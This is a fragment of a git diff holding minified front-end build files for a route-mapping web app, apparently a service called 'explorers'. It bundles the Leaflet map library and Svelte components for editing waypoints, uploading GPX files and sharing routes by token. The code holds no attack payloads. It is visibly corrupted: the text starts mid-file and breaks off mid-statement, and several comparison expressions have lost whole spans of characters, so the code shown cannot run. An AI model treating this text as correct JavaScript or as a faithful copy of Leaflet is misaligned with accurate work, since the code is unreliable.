this._pane},_resetState:function(){this._resetStateTimeout=0,this._moved=!1},_clearDeferredResetState:function(){this._resetStateTimeout!==0&&(clearTimeout(this._resetStateTimeout),this._resetStateTimeout=0)},_onMouseDown:function(t){if(!t.shiftKey||t.which!==1&&t.button!==1)return!1;this._clearDeferredResetState(),this._resetState(),le(),ni(),this._startPoint=this._map.mouseEventToContainerPoint(t),I(document,{contextmenu:Kt,mousemove:this._onMouseMove,mouseup:this._onMouseUp,keydown:this._onKeyDown},this)},_onMouseMove:function(t){this._moved||(this._moved=!0,this._box=U("div","leaflet-zoom-box",this._container),A(this._container,"leaflet-crosshair"),this._map.fire("boxzoomstart")),this._point=this._map.mouseEventToContainerPoint(t);var e=new Q(this._point,this._startPoint),i=e.getSize();nt(this._box,e.min),this._box.style.width=i.x+"px",this._box.style.height=i.y+"px"},_finish:function(){this._moved&&($(this._box),tt(this._container,"leaflet-crosshair")),ce(),oi(),K(document,{contextmenu:Kt,mousemove:this._onMouseMove,mouseup:this._onMouseUp,keydown:this._onKeyDown},this)},_onMouseUp:function(t){if(!(t.which!==1&&t.button!==1)&&(this._finish(),!!this._moved)){this._clearDeferredResetState(),this._resetStateTimeout=setTimeout(_(this._resetState,this),0);var e=new vt(this._map.containerPointToLatLng(this._startPoint),this._map.containerPointToLatLng(this._point));this._map.fitBounds(e).fire("boxzoomend",{boxZoomBounds:e})}},_onKeyDown:function(t){t.keyCode===27&&(this._finish(),this._clearDeferredResetState(),this._resetState())}});H.addInitHook("addHandler","boxZoom",On),H.mergeOptions({doubleClickZoom:!0});var Zn=Et.extend({addHooks:function(){this._map.on("dblclick",this._onDoubleClick,this)},removeHooks:function(){this._map.off("dblclick",this._onDoubleClick,this)},_onDoubleClick:function(t){var e=this._map,i=e.getZoom(),n=e.options.zoomDelta,o=t.originalEvent.shiftKey?i-n:i+n;e.options.doubleClickZoom==="center"?e.setZoom(o):e.setZoomAround(t.containerPoint,o)}});H.addInitHook("addHandler","doubleClickZoom",Zn),H.mergeOptions({dragging:!0,inertia:!0,inertiaDeceleration:3400,inertiaMaxSpeed:1/0,easeLinearity:.2,worldCopyJump:!1,maxBoundsViscosity:0});var In=Et.extend({addHooks:function(){if(!this._draggable){var t=this._map;this._draggable=new Ut(t._mapPane,t._container),this._draggable.on({dragstart:this._onDragStart,drag:this._onDrag,dragend:this._onDragEnd},this),this._draggable.on("predrag",this._onPreDragLimit,this),t.options.worldCopyJump&&(this._draggable.on("predrag",this._onPreDragWrap,this),t.on("zoomend",this._onZoomEnd,this),t.whenReady(this._onZoomEnd,this))}A(this._map._container,"leaflet-grab leaflet-touch-drag"),this._draggable.enable(),this._positions=[],this._times=[]},removeHooks:function(){tt(this._map._container,"leaflet-grab"),tt(this._map._container,"leaflet-touch-drag"),this._draggable.disable()},moved:function(){return this._draggable&&this._draggable._moved},moving:function(){return this._draggable&&this._draggable._moving},_onDragStart:function(){var t=this._map;if(t._stop(),this._map.options.maxBounds&&this._map.options.maxBoundsViscosity){var e=it(this._map.options.maxBounds);this._offsetLimit=pt(this._map.latLngToContainerPoint(e.getNorthWest()).multiplyBy(-1),this._map.latLngToContainerPoint(e.getSouthEast()).multiplyBy(-1).add(this._map.getSize())),this._viscosity=Math.min(1,Math.max(0,this._map.options.maxBoundsViscosity))}else this._offsetLimit=null;t.fire("movestart").fire("dragstart"),t.options.inertia&&(this._positions=[],this._times=[])},_onDrag:function(t){if(this._map.options.inertia){var e=this._lastTime=+new Date,i=this._lastPos=this._draggable._absPos||this._draggable._newPos;this._positions.push(i),this._times.push(e),this._prunePositions(e)}this._map.fire("move",t).fire("drag",t)},_prunePositions:function(t){for(;this._positions.length>1&&t-this._times[0]>50;)this._positions.shift(),this._times.shift()},_onZoomEnd:function(){var t=this._map.getSize().divideBy(2),e=this._map.latLngToLayerPoint([0,0]);this._initialWorldOffset=e.subtract(t).x,this._worldWidth=this._map.getPixelWorldBounds().getSize().x},_viscousLimit:function(t,e){return t-(t-e)*this._viscosity},_onPreDragLimit:function(){if(!(!this._viscosity||!this._offsetLimit)){var t=this._draggable._newPos.subtract(this._draggable._startPos),e=this._offsetLimit;t.xe.max.x&&(t.x=this._viscousLimit(t.x,e.max.x)),t.y>e.max.y&&(t.y=this._viscousLimit(t.y,e.max.y)),this._draggable._newPos=this._draggable._startPos.add(t)}},_onPreDragWrap:function(){var t=this._worldWidth,e=Math.round(t/2),i=this._initialWorldOffset,n=this._draggable._newPos.x,o=(n-e+i)%t+e-i,s=(n+e+i)%t-e-i,r=Math.abs(o+i)0?s:-s))-e;this._delta=0,this._startTime=null,r&&(t.options.scrollWheelZoom==="center"?t.setZoom(e+r):t.setZoomAround(this._lastMousePos,e+r))}});H.addInitHook("addHandler","scrollWheelZoom",Bn);var rs=600;H.mergeOptions({tapHold:T.touchNative&&T.safari&&T.mobile,tapTolerance:15});var Nn=Et.extend({addHooks:function(){I(this._map._container,"touchstart",this._onDown,this)},removeHooks:function(){K(this._map._container,"touchstart",this._onDown,this)},_onDown:function(t){if(clearTimeout(this._holdTimeout),t.touches.length===1){var e=t.touches[0];this._startPos=this._newPos=new E(e.clientX,e.clientY),this._holdTimeout=setTimeout(_(function(){this._cancel(),this._isTapValid()&&(I(document,"touchend",ut),I(document,"touchend touchcancel",this._cancelClickPrevent),this._simulateEvent("contextmenu",e))},this),rs),I(document,"touchend touchcancel contextmenu",this._cancel,this),I(document,"touchmove",this._onMove,this)}},_cancelClickPrevent:function t(){K(document,"touchend",ut),K(document,"touchend touchcancel",t)},_cancel:function(){clearTimeout(this._holdTimeout),K(document,"touchend touchcancel contextmenu",this._cancel,this),K(document,"touchmove",this._onMove,this)},_onMove:function(t){var e=t.touches[0];this._newPos=new E(e.clientX,e.clientY)},_isTapValid:function(){return this._newPos.distanceTo(this._startPos)<=this._map.options.tapTolerance},_simulateEvent:function(t,e){var i=new MouseEvent(t,{bubbles:!0,cancelable:!0,view:window,screenX:e.screenX,screenY:e.screenY,clientX:e.clientX,clientY:e.clientY});i._simulated=!0,e.target.dispatchEvent(i)}});H.addInitHook("addHandler","tapHold",Nn),H.mergeOptions({touchZoom:T.touch,bounceAtZoomLimits:!0});var Dn=Et.extend({addHooks:function(){A(this._map._container,"leaflet-touch-zoom"),I(this._map._container,"touchstart",this._onTouchStart,this)},removeHooks:function(){tt(this._map._container,"leaflet-touch-zoom"),K(this._map._container,"touchstart",this._onTouchStart,this)},_onTouchStart:function(t){var e=this._map;if(!(!t.touches||t.touches.length!==2||e._animatingZoom||this._zooming)){var i=e.mouseEventToContainerPoint(t.touches[0]),n=e.mouseEventToContainerPoint(t.touches[1]);this._centerPoint=e.getSize()._divideBy(2),this._startLatLng=e.containerPointToLatLng(this._centerPoint),e.options.touchZoom!=="center"&&(this._pinchStartLatLng=e.containerPointToLatLng(i.add(n)._divideBy(2))),this._startDist=i.distanceTo(n),this._startZoom=e.getZoom(),this._moved=!1,this._zooming=!0,e._stop(),I(document,"touchmove",this._onTouchMove,this),I(document,"touchend touchcancel",this._onTouchEnd,this),ut(t)}},_onTouchMove:function(t){if(!(!t.touches||t.touches.length!==2||!this._zooming)){var e=this._map,i=e.mouseEventToContainerPoint(t.touches[0]),n=e.mouseEventToContainerPoint(t.touches[1]),o=i.distanceTo(n)/this._startDist;if(this._zoom=e.getScaleZoom(o,this._startZoom),!e.options.bounceAtZoomLimits&&(this._zoome.getMaxZoom()&&o>1)&&(this._zoom=e._limitZoom(this._zoom)),e.options.touchZoom==="center"){if(this._center=this._startLatLng,o===1)return}else{var s=i._add(n)._divideBy(2)._subtract(this._centerPoint);if(o===1&&s.x===0&&s.y===0)return;this._center=e.unproject(e.project(this._pinchStartLatLng,this._zoom).subtract(s),this._zoom)}this._moved||(e._moveStart(!0,!1),this._moved=!0),dt(this._animRequest);var r=_(e._move,e,this._center,this._zoom,{pinch:!0,round:!1},void 0);this._animRequest=X(r,this,!0),ut(t)}},_onTouchEnd:function(){if(!this._moved||!this._zooming){this._zooming=!1;return}this._zooming=!1,dt(this._animRequest),K(document,"touchmove",this._onTouchMove,this),K(document,"touchend touchcancel",this._onTouchEnd,this),this._map.options.zoomAnimation?this._map._animateZoom(this._center,this._map._limitZoom(this._zoom),!0,this._map.options.zoomSnap):this._map._resetView(this._center,this._map._limitZoom(this._zoom))}});H.addInitHook("addHandler","touchZoom",Dn),H.BoxZoom=On,H.DoubleClickZoom=Zn,H.Drag=In,H.Keyboard=An,H.ScrollWheelZoom=Bn,H.TapHold=Nn,H.TouchZoom=Dn,h.Bounds=Q,h.Browser=T,h.CRS=Zt,h.Canvas=Sn,h.Circle=yi,h.CircleMarker=Ie,h.Class=lt,h.Control=Mt,h.DivIcon=Tn,h.DivOverlay=zt,h.DomEvent=bo,h.DomUtil=xo,h.Draggable=Ut,h.Evented=Ht,h.FeatureGroup=It,h.GeoJSON=Bt,h.GridLayer=ve,h.Handler=Et,h.Icon=ee,h.ImageOverlay=Re,h.LatLng=j,h.LatLngBounds=vt,h.Layer=Ct,h.LayerGroup=te,h.LineUtil=No,h.Map=H,h.Marker=Ze,h.Mixin=zo,h.Path=Vt,h.Point=E,h.PolyUtil=Oo,h.Polygon=ie,h.Polyline=At,h.Popup=Fe,h.PosAnimation=an,h.Projection=Do,h.Rectangle=zn,h.Renderer=Nt,h.SVG=ye,h.SVGOverlay=bn,h.TileLayer=oe,h.Tooltip=He,h.Transformation=Ge,h.Util=Le,h.VideoOverlay=Ln,h.bind=_,h.bounds=pt,h.canvas=kn,h.circle=qo,h.circleMarker=Go,h.control=_e,h.divIcon=es,h.extend=l,h.featureGroup=Wo,h.geoJSON=xn,h.geoJson=Yo,h.gridLayer=is,h.icon=Uo,h.imageOverlay=Jo,h.latLng=F,h.latLngBounds=it,h.layerGroup=Ho,h.map=To,h.marker=Vo,h.point=Z,h.polygon=Ko,h.polyline=jo,h.popup=$o,h.rectangle=ss,h.setOptions=k,h.stamp=g,h.svg=En,h.svgOverlay=Qo,h.tileLayer=Mn,h.tooltip=ts,h.transformation=re,h.version=d,h.videoOverlay=Xo;var as=window.L;h.noConflict=function(){return window.L=as,this},window.L=h})})(Ti,Ti.exports);var Cs=Ti.exports;const Jt=Ms(Cs);function Ss(m){let f,h,d,l,w,_,P,g,W,S;return{c(){f=D("div"),h=D("p"),d=D("b"),l=Dt(m[0]),w=yt(),_=D("p"),P=Dt(m[1]),g=yt(),W=D("p"),S=Dt(m[2]),this.h()},l(v){f=R(v,"DIV",{style:!0});var b=Y(f);h=R(b,"P",{});var p=Y(h);d=R(p,"B",{});var x=Y(d);l=Rt(x,m[0]),x.forEach(O),p.forEach(O),w=wt(b),_=R(b,"P",{});var k=Y(_);P=Rt(k,m[1]),k.forEach(O),g=wt(b),W=R(b,"P",{});var ft=Y(W);S=Rt(ft,m[2]),ft.forEach(O),b.forEach(O),this.h()},h(){ct(f,"width","100%"),ct(f,"text-align","center")},m(v,b){st(v,f,b),B(f,h),B(h,d),B(d,l),B(f,w),B(f,_),B(_,P),B(f,g),B(f,W),B(W,S)},p(v,b){b&1&&xe(l,v[0]),b&2&&xe(P,v[1]),b&4&&xe(S,v[2])},d(v){v&&O(f)}}}function ks(m){let f,h="Delete",d,l,w,_,P,g,W,S,v,b;return{c(){f=D("button"),f.textContent=h,d=yt(),l=D("div"),w=Dt(`Title:
+ `),_=D("input"),P=Dt(`
+ Description:
+ `),g=D("input"),W=Dt(`
+ Comment:
+ `),S=D("input"),this.h()},l(p){f=R(p,"BUTTON",{class:!0,"data-svelte-h":!0}),we(f)!=="svelte-1m4hfbw"&&(f.textContent=h),d=wt(p),l=R(p,"DIV",{style:!0});var x=Y(l);w=Rt(x,`Title:
+ `),_=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),P=Rt(x,`
+ Description:
+ `),g=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),W=Rt(x,`
+ Comment:
+ `),S=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),x.forEach(O),this.h()},h(){z(f,"class","button is-small is-danger"),z(_,"class","input is-static"),z(_,"type","text"),z(_,"name","title"),ct(_,"width","100%"),ct(_,"text-align","center"),ct(_,"font-weight","600"),z(g,"class","input is-static"),z(g,"type","text"),z(g,"name","desc"),ct(g,"width","100%"),ct(g,"text-align","center"),ct(g,"font-weight","600"),z(S,"class","input is-static"),z(S,"type","text"),z(S,"name","desc"),ct(S,"width","100%"),ct(S,"text-align","center"),ct(S,"font-weight","600"),ct(l,"width","100%"),ct(l,"text-align","center"),ct(l,"font-weight","400")},m(p,x){st(p,f,x),st(p,d,x),st(p,l,x),B(l,w),B(l,_),Ot(_,m[0]),B(l,P),B(l,g),Ot(g,m[1]),B(l,W),B(l,S),Ot(S,m[2]),v||(b=[bt(f,"click",m[5]),bt(_,"change",m[4]),bt(_,"input",m[6]),bt(g,"change",m[4]),bt(g,"input",m[7]),bt(S,"change",m[4]),bt(S,"input",m[8])],v=!0)},p(p,x){x&1&&_.value!==p[0]&&Ot(_,p[0]),x&2&&g.value!==p[1]&&Ot(g,p[1]),x&4&&S.value!==p[2]&&Ot(S,p[2])},d(p){p&&(O(f),O(d),O(l)),v=!1,Ci(b)}}}function Es(m){let f;function h(w,_){return w[3]?ks:Ss}let d=h(m),l=d(m);return{c(){f=D("div"),l.c()},l(w){f=R(w,"DIV",{});var _=Y(f);l.l(_),_.forEach(O)},m(w,_){st(w,f,_),l.m(f,null)},p(w,[_]){d===(d=h(w))&&l?l.p(w,_):(l.d(1),l=d(w),l&&(l.c(),l.m(f,null)))},i:Pe,o:Pe,d(w){w&&O(f),l.d()}}}function zs(m,f,h){const d=ps();let{title:l}=f,{desc:w}=f,{comment:_}=f,{editable:P}=f;function g(){d("change",{title:l,desc:w,comment:_})}function W(){d("delete",{title:l})}function S(){l=this.value,h(0,l)}function v(){w=this.value,h(1,w)}function b(){_=this.value,h(2,_)}return m.$$set=p=>{"title"in p&&h(0,l=p.title),"desc"in p&&h(1,w=p.desc),"comment"in p&&h(2,_=p.comment),"editable"in p&&h(3,P=p.editable)},[l,w,_,P,g,W,S,v,b]}class Os extends Si{constructor(f){super(),ki(this,f,zs,Es,Mi,{title:0,desc:1,comment:2,editable:3})}}function Zs(m){let f,h,d,l,w;return{c(){f=D("link"),h=yt(),d=D("div"),this.h()},l(_){f=R(_,"LINK",{rel:!0,href:!0,integrity:!0,crossorigin:!0}),h=wt(_),d=R(_,"DIV",{class:!0,style:!0}),Y(d).forEach(O),this.h()},h(){z(f,"rel","stylesheet"),z(f,"href","https://unpkg.com/leaflet@1.6.0/dist/leaflet.css"),z(f,"integrity","sha512-xwE/Az9zrjBIphAcBb3F6JVqxf46+CDLwfLMHloNu6KEQCAWi6HcDUbeOfBIptF7tcCzusKFjFw2yuvEpDL9wQ=="),z(f,"crossorigin",""),z(d,"class","map"),ct(d,"height","400px"),ct(d,"width","100%")},m(_,P){st(_,f,P),st(_,h,P),st(_,d,P),l||(w=vs(m[0].call(null,d)),l=!0)},p:Pe,i:Pe,o:Pe,d(_){_&&(O(f),O(h),O(d)),l=!1,w()}}}function Is(m){if(m.track_points.length>0){let f=m.track_points[0];return[parseFloat(f.lat)||0,parseFloat(f.lon)||0]}return[55.8283,37.5795]}function As(m,f,h){let{route:d}=f,{editable:l}=f,w;function _(v,b,p){let x;v.bindPopup(()=>{let k=Jt.DomUtil.create("div");return x=b(k),k}),v.on("dragend",k=>{p(k.target.getLatLng())}),v.on("popupclose",()=>{if(x){let k=x;x=null,setTimeout(()=>{k.$destroy()},500)}})}function P(){let v=[];for(let b of d.track_points)v.push([parseFloat(b.lat)||0,parseFloat(b.lon)||0]);return Jt.polyline(v,{color:"#E4E",opacity:.5})}function g(v){let b=Is(d),p=Jt.map(v,{preferCanvas:!0}).setView(b,10);return p.attributionControl.setPrefix(""),Jt.tileLayer("https://{s}.basemaps.cartocdn.com/rastertiles/voyager/{z}/{x}/{y}{r}.png",{attribution:`©OpenStreetMap ,
+ ©CARTO `,subdomains:"abcd",maxZoom:14}).addTo(p),p}function W(){w.eachLayer(function(p){p instanceof Jt.LayerGroup&&w.removeLayer(p)});let v=Jt.layerGroup(),b=P();for(let[p,x]of d.waypoints.entries()){let k=[parseFloat(x.lat)||0,parseFloat(x.lon)||0],ft=Jt.marker(k,{draggable:l});_(ft,V=>{let rt=new Os({target:V,props:{title:x.name,desc:x.desc,comment:x.comment,editable:l}});return rt.$on("change",q=>{const M=q.detail;h(1,d.waypoints[p].name=M.title,d),h(1,d.waypoints[p].desc=M.desc,d),h(1,d.waypoints[p].comment=M.comment,d)}),rt.$on("delete",q=>{d.waypoints.splice(p,1),W()}),rt},V=>{h(1,d.waypoints[p].lat=V.lat.toString(),d),h(1,d.waypoints[p].lon=V.lng.toString(),d)}),v.addLayer(ft)}v.addTo(w),b.addTo(w)}function S(v){w=g(v),W()}return m.$$set=v=>{"route"in v&&h(1,d=v.route),"editable"in v&&h(2,l=v.editable)},[S,d,l]}class Bs extends Si{constructor(f){super(),ki(this,f,As,Zs,Mi,{route:1,editable:2})}}function Un(m){let f,h;return{c(){f=D("div"),h=Dt(m[1]),this.h()},l(d){f=R(d,"DIV",{class:!0});var l=Y(f);h=Rt(l,m[1]),l.forEach(O),this.h()},h(){z(f,"class","notification is-danger")},m(d,l){st(d,f,l),B(f,h)},p(d,l){l&2&&xe(h,d[1])},d(d){d&&O(f)}}}function Ns(m){let f,h,d,l,w;return{c(){f=D("div"),h=D("div"),d=D("a"),l=Dt("Share"),this.h()},l(_){f=R(_,"DIV",{});var P=Y(f);h=R(P,"DIV",{class:!0});var g=Y(h);d=R(g,"A",{href:!0});var W=Y(d);l=Rt(W,"Share"),W.forEach(O),g.forEach(O),P.forEach(O),this.h()},h(){z(d,"href",w="/route/"+m[0].id+"?token="+m[0].share_token),z(h,"class","container")},m(_,P){st(_,f,P),B(f,h),B(h,d),B(d,l)},p(_,P){P&1&&w!==(w="/route/"+_[0].id+"?token="+_[0].share_token)&&z(d,"href",w)},d(_){_&&O(f)}}}function Ds(m){let f,h,d,l,w,_,P,g='Upload a GPX file ',W,S,v,b,p,x,k="Upload",ft,V,rt="",q,M,G,mt="Save",Tt,Ft,J=m[2]&&m[2].length>0&&Vn(m);return{c(){f=D("div"),h=D("div"),d=D("div"),l=D("label"),w=D("input"),_=yt(),P=D("span"),P.innerHTML=g,W=yt(),S=D("span"),J&&J.c(),v=yt(),b=D("div"),p=D("div"),x=D("button"),x.textContent=k,ft=yt(),V=D("div"),V.innerHTML=rt,q=yt(),M=D("div"),G=D("button"),G.textContent=mt,this.h()},l(ht){f=R(ht,"DIV",{class:!0});var X=Y(f);h=R(X,"DIV",{class:!0});var dt=Y(h);d=R(dt,"DIV",{class:!0});var Le=Y(d);l=R(Le,"LABEL",{class:!0});var lt=Y(l);w=R(lt,"INPUT",{class:!0,type:!0,name:!0,id:!0}),_=wt(lt),P=R(lt,"SPAN",{class:!0,"data-svelte-h":!0}),we(P)!=="svelte-1yfha46"&&(P.innerHTML=g),W=wt(lt),S=R(lt,"SPAN",{class:!0});var be=Y(S);J&&J.l(be),be.forEach(O),lt.forEach(O),Le.forEach(O),dt.forEach(O),X.forEach(O),v=wt(ht),b=R(ht,"DIV",{class:!0});var et=Y(b);p=R(et,"DIV",{class:!0});var Ht=Y(p);x=R(Ht,"BUTTON",{class:!0,"data-svelte-h":!0}),we(x)!=="svelte-1big487"&&(x.textContent=k),Ht.forEach(O),ft=wt(et),V=R(et,"DIV",{class:!0,"data-svelte-h":!0}),we(V)!=="svelte-1gc3yf9"&&(V.innerHTML=rt),q=wt(et),M=R(et,"DIV",{class:!0});var E=Y(M);G=R(E,"BUTTON",{class:!0,"data-svelte-h":!0}),we(G)!=="svelte-155muy4"&&(G.textContent=mt),E.forEach(O),et.forEach(O),this.h()},h(){z(w,"class","file-input"),z(w,"type","file"),z(w,"name","file"),z(w,"id","file"),z(P,"class","file-cta"),z(S,"class","file-name"),z(l,"class","file-label"),z(d,"class","file"),z(h,"class","column is-half is-offset-one-quarter"),z(f,"class","columns is-centered"),z(x,"class","button is-info"),z(p,"class","column is-one-third has-text-centered"),z(V,"class","column is-one-third has-text-centered"),z(G,"class","button is-primary"),z(M,"class","column is-one-third has-text-centered"),z(b,"class","columns is-centered")},m(ht,X){st(ht,f,X),B(f,h),B(h,d),B(d,l),B(l,w),B(l,_),B(l,P),B(l,W),B(l,S),J&&J.m(S,null),st(ht,v,X),st(ht,b,X),B(b,p),B(p,x),B(b,ft),B(b,V),B(b,q),B(b,M),B(M,G),Tt||(Ft=[bt(w,"change",m[9]),bt(x,"click",m[4]),bt(G,"click",m[5])],Tt=!0)},p(ht,X){ht[2]&&ht[2].length>0?J?J.p(ht,X):(J=Vn(ht),J.c(),J.m(S,null)):J&&(J.d(1),J=null)},d(ht){ht&&(O(f),O(v),O(b)),J&&J.d(),Tt=!1,Ci(Ft)}}}function Vn(m){let f=m[2][0].name+"",h;return{c(){h=Dt(f)},l(d){h=Rt(d,f)},m(d,l){st(d,h,l)},p(d,l){l&4&&f!==(f=d[2][0].name+"")&&xe(h,f)},d(d){d&&O(h)}}}function Rs(m){let f,h,d,l,w,_,P,g,W,S,v,b,p,x,k,ft,V=m[1]&&Un(m),rt=m[3]&&Ns(m);v=new Bs({props:{route:m[0],editable:m[3]}});let q=m[3]&&Ds(m);return{c(){V&&V.c(),f=yt(),h=D("section"),d=D("div"),l=D("input"),w=yt(),_=D("div"),P=D("input"),g=yt(),rt&&rt.c(),W=yt(),S=D("section"),gs(v.$$.fragment),b=yt(),p=D("section"),q&&q.c(),this.h()},l(M){V&&V.l(M),f=wt(M),h=R(M,"SECTION",{class:!0});var G=Y(h);d=R(G,"DIV",{class:!0});var mt=Y(d);l=R(mt,"INPUT",{class:!0,type:!0,placeholder:!0}),w=wt(mt),_=R(mt,"DIV",{class:!0});var Tt=Y(_);P=R(Tt,"INPUT",{class:!0,type:!0,placeholder:!0}),g=wt(Tt),rt&&rt.l(Tt),Tt.forEach(O),mt.forEach(O),G.forEach(O),W=wt(M),S=R(M,"SECTION",{});var Ft=Y(S);ys(v.$$.fragment,Ft),Ft.forEach(O),b=wt(M),p=R(M,"SECTION",{class:!0});var J=Y(p);q&&q.l(J),J.forEach(O),this.h()},h(){z(l,"class","input title is-static"),z(l,"type","text"),z(l,"placeholder","Title"),l.readOnly=!m[3],z(P,"class","input is-static"),z(P,"type","text"),z(P,"placeholder","Description"),P.readOnly=!m[3],z(_,"class","subtitle"),z(d,"class","hero-body"),z(h,"class","hero"),z(p,"class","section")},m(M,G){V&&V.m(M,G),st(M,f,G),st(M,h,G),B(h,d),B(d,l),Ot(l,m[0].title),B(d,w),B(d,_),B(_,P),Ot(P,m[0].description),B(_,g),rt&&rt.m(_,null),st(M,W,G),st(M,S,G),ws(v,S,null),st(M,b,G),st(M,p,G),q&&q.m(p,null),x=!0,k||(ft=[bt(l,"input",m[7]),bt(P,"input",m[8])],k=!0)},p(M,[G]){M[1]?V?V.p(M,G):(V=Un(M),V.c(),V.m(f.parentNode,f)):V&&(V.d(1),V=null),G&1&&l.value!==M[0].title&&Ot(l,M[0].title),G&1&&P.value!==M[0].description&&Ot(P,M[0].description),M[3]&&rt.p(M,G);const mt={};G&1&&(mt.route=M[0]),v.$set(mt),M[3]&&q.p(M,G)},i(M){x||(Ps(v.$$.fragment,M),x=!0)},o(M){xs(v.$$.fragment,M),x=!1},d(M){M&&(O(f),O(h),O(W),O(S),O(b),O(p)),V&&V.d(M),rt&&rt.d(),Ls(v),q&&q.d(),k=!1,Ci(ft)}}}function Fs(m,f,h){let{data:d}=f,l=d.route,w=d.error,_=l.user_id===d.user.id,P;async function g(){if(!P||P.length===0)return;let p=new FormData;p.append("file",P[0]);const x=await fetch(`${bi}/route/${l.id}/upload`,{method:"POST",body:p,credentials:"include"});if(x.ok){h(0,l=await x.json()),h(2,P=null),await Wn();return}h(1,w=await x.text());try{h(1,w=JSON.parse(w).detail.error)}catch(k){console.log(k)}}async function W(){const p=await fetch(`${bi}/route/${l.id}/update`,{method:"POST",body:JSON.stringify({title:l.title,description:l.description,track_points:l.track_points,waypoints:l.waypoints}),credentials:"include",headers:{"Content-Type":"application/json"}});if(p.ok){h(0,l=await p.json()),h(2,P=null),await Wn();return}h(1,w=await p.text());try{h(1,w=JSON.parse(w).detail.error)}catch(x){console.log(x)}}function S(){l.title=this.value,h(0,l)}function v(){l.description=this.value,h(0,l)}function b(){P=this.files,h(2,P)}return m.$$set=p=>{"data"in p&&h(6,d=p.data)},[l,w,P,_,g,W,d,S,v,b]}class qs extends Si{constructor(f){super(),ki(this,f,Fs,Rs,Mi,{data:6})}}export{qs as component,Gs as universal};
diff --git a/services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js b/services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js
new file mode 100644
index 0000000..3d69407
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js
@@ -0,0 +1,15 @@
+import{P as bi}from"../chunks/public.aa8ed6af.js";import{s as Mi,f as D,g as R,h as Y,d as O,i as st,z as Pe,N as ps,l as Dt,a as yt,m as Rt,c as wt,k as ct,v as B,n as xe,u as we,j as z,O as Ot,H as bt,I as Ci,P as vs}from"../chunks/scheduler.1f572272.js";import{S as Si,i as ki,b as gs,d as ys,m as ws,a as Ps,t as xs,e as Ls}from"../chunks/index.b942bf85.js";import{i as Wn}from"../chunks/navigation.872e8737.js";async function bs({fetch:m,parent:f,params:h,url:d}){await f();let l=h.slug,w=d.searchParams.get("token"),_=`${bi}/route/${l}`+(w?`?token=${w}`:""),P=await m(_,{credentials:"include"});if(P.ok)return{route:await P.json(),error:null};let g=await P.text();try{g=await P.json().detail.error}catch{}return{route:{},error:g}}const Gs=Object.freeze(Object.defineProperty({__proto__:null,load:bs},Symbol.toStringTag,{value:"Module"}));var Ts=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Ms(m){return m&&m.__esModule&&Object.prototype.hasOwnProperty.call(m,"default")?m.default:m}var Ti={exports:{}};/* @preserve
+ * Leaflet 1.9.4, a JS library for interactive maps. https://leafletjs.com
+ * (c) 2010-2023 Vladimir Agafonkin, (c) 2010-2011 CloudMade
+ */(function(m,f){(function(h,d){d(f)})(Ts,function(h){var d="1.9.4";function l(t){var e,i,n,o;for(i=1,n=arguments.length;i"u"||!L||!L.Mixin)){t=q(t)?t:[t];for(var e=0;e0?Math.floor(t):Math.ceil(t)};E.prototype={clone:function(){return new E(this.x,this.y)},add:function(t){return this.clone()._add(Z(t))},_add:function(t){return this.x+=t.x,this.y+=t.y,this},subtract:function(t){return this.clone()._subtract(Z(t))},_subtract:function(t){return this.x-=t.x,this.y-=t.y,this},divideBy:function(t){return this.clone()._divideBy(t)},_divideBy:function(t){return this.x/=t,this.y/=t,this},multiplyBy:function(t){return this.clone()._multiplyBy(t)},_multiplyBy:function(t){return this.x*=t,this.y*=t,this},scaleBy:function(t){return new E(this.x*t.x,this.y*t.y)},unscaleBy:function(t){return new E(this.x/t.x,this.y/t.y)},round:function(){return this.clone()._round()},_round:function(){return this.x=Math.round(this.x),this.y=Math.round(this.y),this},floor:function(){return this.clone()._floor()},_floor:function(){return this.x=Math.floor(this.x),this.y=Math.floor(this.y),this},ceil:function(){return this.clone()._ceil()},_ceil:function(){return this.x=Math.ceil(this.x),this.y=Math.ceil(this.y),this},trunc:function(){return this.clone()._trunc()},_trunc:function(){return this.x=Ei(this.x),this.y=Ei(this.y),this},distanceTo:function(t){t=Z(t);var e=t.x-this.x,i=t.y-this.y;return Math.sqrt(e*e+i*i)},equals:function(t){return t=Z(t),t.x===this.x&&t.y===this.y},contains:function(t){return t=Z(t),Math.abs(t.x)<=Math.abs(this.x)&&Math.abs(t.y)<=Math.abs(this.y)},toString:function(){return"Point("+b(this.x)+", "+b(this.y)+")"}};function Z(t,e,i){return t instanceof E?t:q(t)?new E(t[0],t[1]):t==null?t:typeof t=="object"&&"x"in t&&"y"in t?new E(t.x,t.y):new E(t,e,i)}function Q(t,e){if(t)for(var i=e?[t,e]:t,n=0,o=i.length;n=this.min.x&&i.x<=this.max.x&&e.y>=this.min.y&&i.y<=this.max.y},intersects:function(t){t=pt(t);var e=this.min,i=this.max,n=t.min,o=t.max,s=o.x>=e.x&&n.x<=i.x,r=o.y>=e.y&&n.y<=i.y;return s&&r},overlaps:function(t){t=pt(t);var e=this.min,i=this.max,n=t.min,o=t.max,s=o.x>e.x&&n.xe.y&&n.y=e.lat&&o.lat<=i.lat&&n.lng>=e.lng&&o.lng<=i.lng},intersects:function(t){t=it(t);var e=this._southWest,i=this._northEast,n=t.getSouthWest(),o=t.getNorthEast(),s=o.lat>=e.lat&&n.lat<=i.lat,r=o.lng>=e.lng&&n.lng<=i.lng;return s&&r},overlaps:function(t){t=it(t);var e=this._southWest,i=this._northEast,n=t.getSouthWest(),o=t.getNorthEast(),s=o.lat>e.lat&&n.late.lng&&n.lng1,oo=function(){var t=!1;try{var e=Object.defineProperty({},"passive",{get:function(){t=!0}});window.addEventListener("testPassiveEventSupport",v,e),window.removeEventListener("testPassiveEventSupport",v,e)}catch{}return t}(),so=function(){return!!document.createElement("canvas").getContext}(),Xe=!!(document.createElementNS&&Oi("svg").createSVGRect),ro=!!Xe&&function(){var t=document.createElement("div");return t.innerHTML=" ",(t.firstChild&&t.firstChild.namespaceURI)==="http://www.w3.org/2000/svg"}(),ao=!Xe&&function(){try{var t=document.createElement("div");t.innerHTML=' ';var e=t.firstChild;return e.style.behavior="url(#default#VML)",e&&typeof 